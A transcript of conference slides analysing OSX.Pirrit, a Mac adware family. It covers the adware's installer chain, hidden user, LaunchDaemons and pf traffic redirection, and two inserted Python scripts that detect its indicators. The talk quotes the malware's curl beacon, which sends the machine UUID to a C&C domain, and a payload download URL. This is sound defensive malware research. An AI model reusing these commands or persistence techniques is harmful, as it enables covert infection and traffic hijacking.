OSX/Pirrit: The blue balls of OS X adware

© 2016 Cybereason Inc. All rights reserved. OSX.Pirrit: The blue balls of OS X adware

Upload: amit-serper

Post on 19-Feb-2017


TRANSCRIPT

Page 1: OSX/Pirrit: The blue balls of OS X adware

© 2016 Cybereason Inc. All rights reserved.  

OSX.Pirrit: The blue balls of OS X adware

Page 2: OSX/Pirrit: The blue balls of OS X adware


$ whoami

• Amit Serper (What’s with the weird name, dude?)
• Lead OS X and Linux security researcher @ Cybereason
• Low level research (Kernel, reversing, etc...)
• Writing poorly programmed attack simulation tools (crappy coder)
• Malware research
• HackingTeam server research (with @awfrazer):
  • Slides: http://hackedteam.lol
  • Paper: http://ht-paper.amit.wtf
  • Blogs: http://ht1.amit.wtf, http://ht2.amit.wtf
• Lead security researcher @ Israeli government agency (9 years)
• <REDACTED>
• Follow me on twitter: @0xAmit

Page 3: OSX/Pirrit: The blue balls of OS X adware


$ cat /etc/motd

Page 4: OSX/Pirrit: The blue balls of OS X adware


$ cat /etc/motd

Page 5: OSX/Pirrit: The blue balls of OS X adware


$ cat /Users/amit/agenda.txt

This talk is based on my blog post on objective-see.com. See direct link: http://pirrit.amit.wtf

Page 6: OSX/Pirrit: The blue balls of OS X adware


$ cat /Users/amit/agenda.txt

1. For those that weren’t around 15 years ago: Intro to adware
2. This apple is getting ripe: Adware on Mac
3. The blue balls: OSX.Pirrit

Page 7: OSX/Pirrit: The blue balls of OS X adware


Intro to Adware

• Adware usually gets to your machine with installers.
• These installers install a program that you downloaded and then offer to add some other program that will enhance your experience

Page 8: OSX/Pirrit: The blue balls of OS X adware


Intro to Adware

1. Software that resides on one’s machine and displays ads
2. Adware divides into several categories:
   A. Plain and stupid – Just displays popups without any context
   B. The “norm” – Displays banners (and rarely popups) according to basic metrics that are gathered from the browser
   C. The black-ops operative – Installs a hidden program that can see your entire traffic, injects ads into pages you visit and even overrides legitimate ads that were put there in the first place (That’s stealing!)

Page 9: OSX/Pirrit: The blue balls of OS X adware


Adware on the Mac

1. Similar to Windows, adware for OS X usually comes in the form of toolbars
2. These toolbars are Safari plugins – like Spigot…

http://www.thesafemac.com/arg-spigot

Page 10: OSX/Pirrit: The blue balls of OS X adware


Adware on the Mac

1. Similar to Windows, adware for OS X usually comes in the form of toolbars
2. These toolbars are Safari plugins – like Spigot…
3. Spigot also installs LaunchAgents!

http://www.thesafemac.com/arg-spigot

Page 11: OSX/Pirrit: The blue balls of OS X adware


The story begins…

• An IRC user “Xiano” popped into #osxre @ freenode and told us that his friend’s Mac is acting weird
• He said that internet browsing is rather slow and some weird processes are showing up.
• He then shared with us a weird executable called “sizzling”.
• Another channel member, “Paraxor”, started reversing that executable and quoted some function names
• It was immediately clear that this is some sort of adware because of these strings

Page 12: OSX/Pirrit: The blue balls of OS X adware


No, seriously you guys…

Page 13: OSX/Pirrit: The blue balls of OS X adware


Qt?

• Qt (pronounced “cute”) is a cross-platform application development framework
• Allows a developer to maintain a single codebase for an application that will run on Windows, Linux, Mac and other platforms…
• The “cost” of that is a lot of external libraries that are linked with your application

Page 14: OSX/Pirrit: The blue balls of OS X adware


The story begins… (continued)

http://forums.macrumors.com/threads/what-is-unillumination-process-mavericks.1966015/

Page 15: OSX/Pirrit: The blue balls of OS X adware

Page 16: OSX/Pirrit: The blue balls of OS X adware

Page 17: OSX/Pirrit: The blue balls of OS X adware

Page 18: OSX/Pirrit: The blue balls of OS X adware

Let’s look at the binary (strings table)

Page 19: OSX/Pirrit: The blue balls of OS X adware


Another URL in the strings table

Page 20: OSX/Pirrit: The blue balls of OS X adware


Let’s google that url…

http://shorte.st/st/2904deaf2db062b776f39f499bf88ad9/%1

Gives 1 result to a JoeSandbox analysis of a Windows PE executable

Page 21: OSX/Pirrit: The blue balls of OS X adware


Shorte.st – URL shortening service

Page 22: OSX/Pirrit: The blue balls of OS X adware


Let’s google that…

Page 23: OSX/Pirrit: The blue balls of OS X adware


Let’s look at the script – rec_script.sh

Page 24: OSX/Pirrit: The blue balls of OS X adware


Windows is easy…

Page 25: OSX/Pirrit: The blue balls of OS X adware


But removal instructions for mac?

Page 26: OSX/Pirrit: The blue balls of OS X adware


Xiano was back with more…

• He found an app bundle called “DemoUpdater” on his friend’s machine.
• He mentioned that this app bundle was running under a different user which he did not know.
• Inside the app bundle was an x64 Mach-O binary executable and a shell script called Update2.sh.
• This was far more interesting.

Page 27: OSX/Pirrit: The blue balls of OS X adware


In the executable - Suspicious functions and strings galore!

Page 28: OSX/Pirrit: The blue balls of OS X adware


Mysterious domains

*.93a555685cc7443a8e1034efa1f18924.com *.aa625d84f1587749c1ab011d6f269f7d64.com *.2ff328dcee054f2f9a9a5d7e966e3ec0.com *.aae219721390264a73aa60a5e6ab6ccc4e.com

Page 29: OSX/Pirrit: The blue balls of OS X adware


And also… Some more windows crap

Page 30: OSX/Pirrit: The blue balls of OS X adware


But what about that update2 shell script?

• When the executable finishes running, it executes Update2.sh
• It’s a HUGE script (330 lines) – it even has some inline Python code (python -c)
• Gets the machine UUID via command line (ioreg, parses its huge output with awk and grep)
• Sends the machine ID to a server in order to get a new ID back from the server by issuing a curl command:
  curl "http://93a555685cc7443a8e1034efa1f18924.com/v/cld?mid=<UUID>&ct=pd"
• It validates your geolocation by curl’ing ipinfo.io/country and checks that you are from the US, UK, Spain, Australia, France, Germany, India, Italy, the Netherlands or New Zealand in order to download a different “ad package”.
• It updates the C&C and tells it that the installation was successful, using the UUID as an identifier.
• After the C&C has been notified, the script downloads and installs another program called “DemoInjector”
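To show how the registration beacon, the ipinfo.io check and the DemoInjector download just described could be spotted on the wire, here is an added Python example (not code from the talk or from Pirrit’s own scripts) that scans constructed proxy log lines; the log format, the client addresses and the UUID value are assumptions, while the hex-label domains, the /v/cld?mid=…&ct=pd path and the /static/pd_files/dit<N>.tgz path come from the slides.

```python
"""Spot Pirrit beacon and download traffic in constructed proxy log lines.

Indicators from the talk: C&C hosts are long hex labels under .com, Update2.sh
registers the machine with GET /v/cld?mid=<UUID>&ct=pd, and DemoInjector is
fetched from /static/pd_files/dit<N>.tgz. Log format, client addresses and the
UUID are constructed for this example.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Host whose label before .com is 32+ hex chars (the talk's domains are 32 or
# 34 hex chars long), optionally with subdomains in front of it.
HEX_LABEL_COM = re.compile(r"^(?:[\w-]+\.)*[0-9a-f]{32,}\.com$", re.IGNORECASE)
UUID_RE = re.compile(r"^[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}$", re.IGNORECASE)

# Constructed log: "<client> <method> <url>", one request per line.
SAMPLE_LOG = """\
10.0.0.5 GET http://www.example.com/index.html
10.0.0.5 GET http://93a555685cc7443a8e1034efa1f18924.com/v/cld?mid=6F3A1C2E-1B4D-4E8A-9C3B-7D2E5F6A8B9C&ct=pd
10.0.0.7 GET http://ipinfo.io/country
10.0.0.5 GET http://cdn.aa625d84f1587749c1ab011d6f269f7d64.com/static/pd_files/dit3.tgz
10.0.0.9 GET https://update.example.org/v/cld?mid=foo&ct=pd
"""

def classify_request(url: str) -> list:
    """Return the names of the Pirrit indicators this URL matches ([] if none)."""
    parts = urlsplit(url)
    query = parse_qs(parts.query)
    hits = []
    if HEX_LABEL_COM.match(parts.hostname or ""):
        hits.append("hex-label-domain")
    # Registration beacon: exact path, ct=pd, and mid must look like a UUID
    if (parts.path == "/v/cld" and query.get("ct") == ["pd"]
            and UUID_RE.match(query.get("mid", [""])[0])):
        hits.append("cld-beacon")
    if parts.path.startswith("/static/pd_files/dit") and parts.path.endswith(".tgz"):
        hits.append("demoinjector-download")
    return hits

def scan_log(text: str) -> list:
    """Return (client, url, indicators) for every request that matched something."""
    findings = []
    for line in text.splitlines():
        if not line.strip():
            continue
        client, _method, url = line.split(None, 2)
        hits = classify_request(url)
        if hits:
            findings.append((client, url, hits))
    return findings
```

The last sample line shows why the UUID check matters: a /v/cld?ct=pd path on an unrelated host with a non-UUID mid is left alone.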

Page 31: OSX/Pirrit: The blue balls of OS X adware


So here’s what we know until now

• It’s adware
• It generates traffic
• It’s cross-platform
• It’s definitely trying to hide strings and domains inside the binary
• It adds a hidden user with a weird name – it has to get root access
• It runs weird processes with strange names
• It has a component called “DemoUpdater”

Page 32: OSX/Pirrit: The blue balls of OS X adware


But here’s what no one knows

How the hell did people get infected?!

Page 33: OSX/Pirrit: The blue balls of OS X adware


FLASH SIDEWAYS!

Page 34: OSX/Pirrit: The blue balls of OS X adware


FLASH SIDEWAYS!

Page 35: OSX/Pirrit: The blue balls of OS X adware


PKG file?

• Mac equivalent of the MSI (Installer file)
• An extensible archive format (XAR)
• Has a nice wizard with useful EULA messages
• Can be signed with a developer certificate
• Has the ability to run pre/post install scripts!

Page 36: OSX/Pirrit: The blue balls of OS X adware


PKG file!

• Pkg files are a very convenient way to drop malware
• You can codesign them
• And you can just use the scripting features to do whatever you want to.

Page 37: OSX/Pirrit: The blue balls of OS X adware


PKG file – Suspicious package

http://www.mothersruin.com/software/SuspiciousPackage/

Page 38: OSX/Pirrit: The blue balls of OS X adware


PKG file – Suspicious package

Page 39: OSX/Pirrit: The blue balls of OS X adware


Let’s look at this script

Page 40: OSX/Pirrit: The blue balls of OS X adware


Entire process

User downloads crack → Gets pkg → Pre-install script runs → Script downloads “DemoUpdater” component → DemoUpdater prepares the infrastructure for DemoInjector → Profit!

Page 41: OSX/Pirrit: The blue balls of OS X adware


DemoUpdater

• DemoUpdater is the first component that’s actually being installed by Pirrit.
• This is the component that lays the groundwork for the traffic hijacking proxy
• This is the script that generates the strange names
• After a random name is generated, it is written to com.common.plist
• It then creates another plist to hold its preferences. That plist is created with a random name on each install (com.<RANDOMWORD>.preferences.plist)

Page 42: OSX/Pirrit: The blue balls of OS X adware


DemoUpdater

• The script then carries on with creating the DemoUpdater bundle and executable, not forgetting to change its name to make detection harder
• It then downloads the next component, DemoInjector, and adds a LaunchDaemon for it.

Page 43: OSX/Pirrit: The blue balls of OS X adware


Wait… LaunchDaemons?

• A LaunchDaemon is an autorun in Mac speak
• It loads when the computer boots
• And just like everything in OS X, it’s also stored in a plist file

Page 44: OSX/Pirrit: The blue balls of OS X adware


The soil is ready… Now – plant the seed

• After all of the basic building blocks were laid, it is time for the main event
• We have a random name generated for DemoUpdater
• We have an autorun set up for DemoUpdater
• Now it’s time to get the proxy and get crackin’!
• The proxy is DemoInjector (remember it from before?)
• It will be downloaded from:
  http://93a555685cc7443a8e1034efa1f18924.com/static/pd_files/dit3.tgz
• The number in the tgz file name is incremental – a different version each time
• The latest version of DemoInjector is dit8 and it is from April 10th 2016.

Page 45: OSX/Pirrit: The blue balls of OS X adware


The soil is ready… Now – plant the seed

• The proxy is called DemoInjector.
• It is also a Qt project.
• It also has a lot of shell scripts!
• The most interesting one is install_injector.sh
• It also generates a random company name and executable name
• And it creates a hidden user!

Page 46: OSX/Pirrit: The blue balls of OS X adware


A hidden user… Oh my!

Page 47: OSX/Pirrit: The blue balls of OS X adware


Hide500Users?

Page 48: OSX/Pirrit: The blue balls of OS X adware


Someone was reading Apple documentation

https://support.apple.com/en-il/HT203998

Page 49: OSX/Pirrit: The blue balls of OS X adware


Someone was reading Apple documentation

Page 50: OSX/Pirrit: The blue balls of OS X adware


Another LaunchDaemon, this time for DemoInjector

Page 51: OSX/Pirrit: The blue balls of OS X adware


And now – Traffic redirection!

• DemoInjector is listening on 127.0.0.1:9882
• All of the packets that are generated by everyone but $HIDDEN_USERS are forwarded to DemoInjector using pf
• These settings also exist in another file that is dropped by the installer, called /etc/change_net_settings. There’s also a LaunchDaemon for that!
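As an added host-triage example (not code from the talk or from Pirrit), this Python script checks the three persistence facts from the LaunchDaemon, hidden-user and traffic-redirection slides against constructed command output: a pf rdr rule to a loopback port with a per-user exemption, an account below UID 500 that Hide500Users would conceal (Apple’s own low-UID service accounts carry a leading underscore, plus root, daemon and nobody), and a LaunchDaemon whose ProgramArguments run /etc/change_net_settings. The pf rule wording, the user name wsgrhjzu with UID 401 and the daemon label are assumptions.

```python
"""Host triage for the Pirrit persistence above: pf redirect, hidden user, daemon.

Inputs are constructed text shaped like `pfctl -s nat` / `pfctl -s rules`,
`dscl . -list /Users UniqueID` and a LaunchDaemon plist; rule text, user
names and the daemon label are made up for this example.
"""
import plistlib
import re

# rdr rule to a loopback port (DemoInjector listens on 127.0.0.1:9882), and a
# per-user exemption (the hidden user's own traffic has to bypass the proxy)
RDR_TO_LOCALHOST = re.compile(r"^rdr\b.*->\s*127\.0\.0\.1\s+port\s+(\d+)")
USER_EXEMPT = re.compile(r"\buser\s*!=\s*\"?([A-Za-z0-9_]+)\"?")
APPLE_LOW_UID = {"root", "daemon", "nobody"}  # Apple's non-underscore UIDs < 500

PF_RULES = """\
rdr pass on lo0 inet proto tcp from any to any port 80 -> 127.0.0.1 port 9882
pass out route-to (lo0 127.0.0.1) inet proto tcp from any to any port 80 user != wsgrhjzu
"""
DSCL_USERS = """\
_spotlight 89
amit 501
root 0
wsgrhjzu 401
"""
NET_DAEMON = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict><key>Label</key><string>com.qtnxh.netsettings</string>
<key>ProgramArguments</key><array><string>/bin/sh</string>
<string>/etc/change_net_settings</string></array>
<key>RunAtLoad</key><true/></dict></plist>"""

def pf_findings(rules: str) -> dict:
    """Loopback redirect ports and user exemptions present in pf rule text."""
    ports, exempt = [], []
    for line in rules.splitlines():
        if m := RDR_TO_LOCALHOST.search(line):
            ports.append(int(m.group(1)))
        if m := USER_EXEMPT.search(line):
            exempt.append(m.group(1))
    return {"redirect_ports": ports, "exempt_users": exempt}

def hidden_users(listing: str) -> list:
    """Accounts with UID < 500 that are not Apple's: what Hide500Users conceals."""
    rows = [line.split() for line in listing.splitlines() if line.strip()]
    return [name for name, uid in rows
            if int(uid) < 500 and not name.startswith("_") and name not in APPLE_LOW_UID]

def daemon_runs_script(plist_bytes: bytes, script: str) -> bool:
    """True if the LaunchDaemon plist's ProgramArguments name the given script."""
    return script in plistlib.loads(plist_bytes).get("ProgramArguments", [])
```

A user name that shows up both as a pf exemption and in the hidden-user list is the strongest single signal here, since normal pf configurations have no reason to exempt one account from a loopback redirect.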

Page 52: OSX/Pirrit: The blue balls of OS X adware


Aaaaand… Profit!

Page 53: OSX/Pirrit: The blue balls of OS X adware


Droppers… Droppers everywhere!

Page 54: OSX/Pirrit: The blue balls of OS X adware


I created a small removal script

http://github.com/aserper

Some people had problems with it…

Page 55: OSX/Pirrit: The blue balls of OS X adware


Conclusion

Page 56: OSX/Pirrit: The blue balls of OS X adware


THANKS !

1. PATRICK WARDLE / OBJECTIVE-SEE.COM / @PATRICKWARDLE
2. DATAGRAM – FOR THE AWESOME HOSPITALITY
3. My pals from Cybereason for the moral support (and for picking up the check)
4. @VISS
5. YOU!

Page 57: OSX/Pirrit: The blue balls of OS X adware


THANKS !

Come see me popping shells @ fail of things right after this!

Page 58: OSX/Pirrit: The blue balls of OS X adware


Thank you.